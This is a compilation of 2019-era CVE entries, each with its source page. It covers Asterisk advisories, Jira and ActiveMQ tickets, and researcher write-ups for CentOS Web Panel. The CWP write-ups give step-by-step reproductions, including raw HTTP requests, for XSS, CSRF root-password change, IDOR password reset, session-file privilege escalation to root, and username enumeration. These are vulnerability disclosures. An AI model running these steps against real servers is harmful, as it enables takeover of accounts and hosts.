Jenkins Log Parser Plugin 2.0 and earlier did not escape an error message, resulting in a cross-site scripting vulnerability exploitable by users able to define log parsing rules.

CVE-2019-10410: Jenkins Security Advisory 2019-09-25

res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference.

Asterisk Project Security Advisory - AST-2019-004

 

**Product**

Asterisk

**Summary**

Crash when negotiating for T.38 with a declined stream

**Nature of Advisory**

Remote Crash

**Susceptibility**

Remote Authenticated Sessions

**Severity**

Minor

**Exploits Known**

No

**Reported On**

August 05, 2019

**Reported By**

Alexei Gradinari

**Posted On**

September 05, 2019

**Last Updated On**

September 4, 2019

**Advisory Contact**

kharwell AT sangoma DOT com

**CVE Name**

CVE-2019-15297

 

**Description**

When Asterisk sends a re-invite initiating T.38 faxing, and the endpoint responds with a declined media stream a crash will then occur in Asterisk.

**Modules Affected**

res\_pjsip\_t38.c

 

**Resolution**

If T.38 faxing is not required then setting the “t38\_udptl” configuration option on the endpoint to “no” disables this functionality. This option defaults to “no” so you have to have explicitly set it “yes” to potentially be affected by this issue.

Otherwise, if T.38 faxing is required then Asterisk should be upgraded to a fixed version.

  

**Affected Versions**

**Product**

**Release Series**

Asterisk Open Source

15.x

All releases

Asterisk Open Source

16.x

All releases

 

**Corrected In**

**Product**

**Release**

Asterisk Open Source

15.7.4,16.5.1

 

**Patches**

**SVN URL**

**Revision**

http://downloads.asterisk.org/pub/security/AST-2019-004-15.diff

Asterisk 15

http://downloads.asterisk.org/pub/security/AST-2019-004-16.diff

Asterisk 16

 

**Links**

https://issues.asterisk.org/jira/browse/ASTERISK-28495

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2019-004.pdf and http://downloads.digium.com/pub/security/AST-2019-004.html

  

**Revision History**

**Date**

**Editor**

**Revisions Made**

August 28, 2019

Kevin Harwell

Initial revision

Asterisk Project Security Advisory - AST-2019-004  
Copyright © 2019 Digium, Inc. All Rights Reserved.  
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

CVE-2019-15297: AST-2019-004

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, XSS in the domain parameter allows a low-privilege user to achieve root access via the email list page.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

User add "New Mail box" with payload XSS without validation

  
**Reproduce**

1.  In user panel and browse to https://192.168.242.135:2083/cwp\_1a73dced77d0eb7f/test1/?module=email\_accounts or Click at Email Accounts under the Email Accounts and click it again like image below

  

2.  Click "Add a New MailBox"

  

3.  Fill the information

  

4.  Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS

  

5.  We can added email success the parameter "domain" without input validate

  

6.  In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success

  

7.  Let's see in the panel admin Click Email --> Email Accounts we can see the xss payload

  

8.  Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed

  

9.  In this example I'll tried to Click Change Password, XSS will be executed

!

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13476: CentOS-Control-Web-Panel-CVE/CVE-2019-13476.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

CVE-2019-14246: CentOS-WebPanel.com Control Web Panel (CWP) 0.9.8.851 phpMyAdmin Password Change ≈ Packet Storm

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, CSRF in the forgot password function allows an attacker to change the password for the root account.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

CVE-2019-13476 (XSS) + CVE-2019-13477 (CSRF) Can change password no need to know current password

  
**Reproduce**

1.  login as normal user

  

2.  Click at Email Accounts under the Email Accounts and click it again like image below

  

3.  Click add "New MailBox"

  

4.  add "New mail" and intercept request (use Burp suite for intercept request)

  

5.  Insert payload at parameter "domain" then click "intercept is on" in burp suite

  

6.  Payload added success (in mail box panel user it's doesn't exist after add payload XSS but in panel admin it's will exist)

Script change password (PoC.php)

  

7.  Login as user root (victim) user : root pass : P@ssw0rd

  

8.  After login we will see the left side tap and click at "Email" then click "Email Accounts" under "Email" like image below

  

9.  We can see payload

  

10.  Click any button such as Change Password, Suspend, Delete after click Payload will be executed.

  

11.  After click it's will be redirect and password has been changed password is "AttackerPassword"

  

12.  try to login with old password "P@ssw0rd" we got login failed (image below)

  

13.  Login as root and new password "AttackerPassword"

  

14.  Login success

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13477: CentOS-Control-Web-Panel-CVE/CVE-2019-13477.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

The inline-create rest resource in Jira before version 7.12.3 allows authenticated remote attackers to set the reporter in issues via a missing authorisation check.

**Details**

*   **Type: ** Bug
    

*   **Priority: ** Medium
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** 7.8.0, 7.10.1
    

*   **Labels:**
    
    *   CVE-2018-20826
    *   advisory
    *   advisory-released
    *   bugbounty
    *   cvss-medium
    *   idor
    *   security
    

*   **Fixed in Long Term Support Release/s:**
    
*   **Introduced in Version:**
    
    7.08
    
*   **Symptom Severity:**
    
    Severity 3 - Minor
    

**Description**

The inline-create rest resource in Jira before version 7.12.3 allows authenticated remote attackers to set the reporter in issues via a missing authorisation check.

**Attachments**

**Activity**

**People**

Votes:

0 Vote for this issue

Watchers:

1 Start watching this issue

**Dates**

Created:

29/Apr/2019 3:27 AM

Updated:

22/May/2020 8:22 AM

Resolved:

29/Apr/2019 3:29 AM

CVE-2018-20826: [JRASERVER-69239] Permissions bypass in the inline-create rest resource - CVE-2018-20826

It was found that the Apache ActiveMQ client before 5.14.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.

Log inSkip to main contentSkip to sidebar

*   Dashboards
*   Projects
*   Issues

*   Help
    
    *   Jira Core help
    *   Keyboard Shortcuts
    *   About Jira
    *   Jira Credits
    
*   Log In

Public signup for this instance is **disabled**. Go to our Self serve sign up page to request an account.

1.  ActiveMQ
2.  AMQ-6470

Log In

Export

XMLWordPrintableJSON

**Details**

*   **Type: ** Improvement
    
*   **Status:** Resolved
    
*   **Priority: ** Major
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** 5.14.1
    
*   **Fix Version/s:** 5.15.0, 5.14.5
    
*   **Component/s:** None
    
*   **Labels:**
    
    None
    

**Description**

We still have unnecessary handling for ControlCommand in ActiveMQClient

**Attachments**

**Activity**

**People**

Assignee:

 Dejan Bosanac

Reporter:

 Dejan Bosanac

Votes:

0 Vote for this issue

Watchers:

4 Start watching this issue

**Dates**

Created:

18/Oct/16 10:00

Updated:

25/Apr/17 08:58

Resolved:

18/Oct/16 10:32

CVE-2015-7559: [AMQ-6470] Remove unused ControlCommand handling in client

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.836, a cwpsrv-xxx cookie allows a normal user to craft and upload a session file to the /tmp directory, and use it to become the root user.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Root Privilege Escalation
    version             : 0.9.8.836
    Fixed on            : 0.9.8.840
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13359
    

  
**Description**

The vulnerability allows low privilege users to escalate themself to become a root user by crafting a session file from testing environment and upload to the target server at /tmp directory

  
**State 1 Session prepareation (Testing Environment)**

1.  Check the current IP address of attacker

  

2.  Set the IP address on testing environment network

  

3.  Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)

  

4.  Copy the content of session file (/tmp/sess\_xxxxxxxxxxxxxx) to a new file "sess\_123456" # we need "rkey"

  

5.  Save the token value from the session file (cwp\_24a7ebcfc91fc0817cc8961b115c8cd0)

**State 2 Attack the target**

6.  On the real target, login as a normal user on port 2083 and upload file "sess\_123456" to /tmp directory

Login

Upload sess\_123456 file

Intercept the request

Modify the parameter "fm\_current\_dir" value to "/tmp/"

Upload successfully

  

7.  On another browser, replace the token value in the URL https://\[target.com\]:2031/cwp\_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php and create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess\_123456)

  

8.  Refresh browser and got root

Root panel

Check the file sess\_123456

Web console

\*From step 6 - 8, we need to complete it quickly. if we do it too slow, the application will change the permission of file sess\_123456 to 600 and the file will become 0 byte. If this happened, we need to change session file name and repeat the steps again. To avoid the problem, set crontab and execute it

    * * * * * chmod 664 /tmp/sess_123456" 
    

**Timeline**

    2019-06-30: Discovered the bug
    2019-06-30: Reported to vendor
    2019-06-30: Vender accepted the vulnerability
    2019-07-02: The vulnerability has been fixed
    2019-07-06: Published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

CVE-2019-13359: CentOS-Control-Web-Panel-CVE/CVE-2019-13359.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, the Login process allows attackers to check whether a username is valid by reading the HTTP response.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : User enumeration on user panel
    version             : 0.9.8.846
    Fixed on            : 0.9.8.848
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13383
    

  
**Description**

The vulnerability allows remote attacker to check whether a username is valid by reading the HTTP response

  
**Reproduce**

    The target server has user "user1"
    

1.  Login with invalid username and password

  

2.  Intercept the request

  

3.  From the request, if the user dose not exist, the server responses "suspended"

  

4.  if the user dose exist, the server responses "failed" or nothing (depends on version)

  

5.  Try brute-forcing username against the server

**Timeline**

    2019-07-06: Discovered the bug
    2019-07-06: Reported to vendor
    2019-07-06: Vender accepted the vulnerability
    2019-07-11: The vulnerability has been fixed
    2019-07-15: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

CVE-2019-13383: CentOS-Control-Web-Panel-CVE/CVE-2019-13383.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration).

Asterisk Project Security Advisory - AST-2019-003

 

**Product**

Asterisk

**Summary**

Remote Crash Vulnerability in chan\_sip channel driver

**Nature of Advisory**

Denial of Service

**Susceptibility**

Remote Unauthenticated Sessions

**Severity**

Minor

**Exploits Known**

No

**Reported On**

June 28, 2019

**Reported By**

Francesco Castellano

**Posted On**

July 1, 2019

**Last Updated On**

July 2, 2019

**Advisory Contact**

Jcolp AT sangoma DOT com

**CVE Name**

CVE-2019-13161

 

**Description**

When T.38 faxing is done in Asterisk a T.38 reinvite may be sent to an endpoint to switch it to T.38. If the endpoint responds with an improperly formatted SDP answer including both a T.38 UDPTL stream and an audio or video stream containing only codecs not allowed on the SIP peer or user a crash will occur. The code incorrectly assumes that there will be at least one common codec when T.38 is also in the SDP answer.

This requires Asterisk to initiate a T.38 reinvite which is only done when executing the ReceiveFax dialplan application or performing T.38 passthrough where a remote endpoint has requested T.38.

For versions of Asterisk 13 before 13.21.0 and Asterisk 15 before 15.4.0 the “preferred\_codec\_only” option must also be set to “yes”. If set to “no” the crash will not occur.

 

**Resolution**

If T.38 faxing is not required this functionality can be disabled by ensuring the “t38pt\_udptl” is set to “no” so a T.38 reinvite is not possible.

If T.38 faxing is required then Asterisk should be upgraded to a fixed version. The problem can also be limited in scope by enabling T.38 faxing only for endpoints which actually participate in fax.

  

**Affected Versions**

**Product**

**Release Series**

Asterisk Open Source

13.x

All releases

Asterisk Open Source

15.x

All releases

Asterisk Open Source

16.x

All releases

Certified Asterisk

13.21

All releases

 

**Corrected In**

**Product**

**Release**

Asterisk Open Source

13.27.1

Asterisk Open Source

15.7.3

Asterisk Open Source

16.4.1

Certified Asterisk

13.21-cert4

 

**Patches**

**SVN URL**

**Revision**

http://downloads.asterisk.org/pub/security/AST-2019-003-13.diff

Asterisk 13

http://downloads.asterisk.org/pub/security/AST-2019-003-15.diff

Asterisk 15

http://downloads.asterisk.org/pub/security/AST-2019-003-16.diff

Asterisk 16

http://downloads.asterisk.org/pub/security/AST-2019-003-13.21.diff

Certified Asterisk 13.21

 

**Links**

https://issues.asterisk.org/jira/browse/ASTERISK-28465

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2019-003.pdf and http://downloads.digium.com/pub/security/AST-2019-003.html

  

**Revision History**

**Date**

**Editor**

**Revisions Made**

July 1, 2019

Joshua Colp

Initial revision

Asterisk Project Security Advisory - AST-2019-003  
Copyright © 2019 Digium, Inc. All Rights Reserved.  
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

Tag

#jira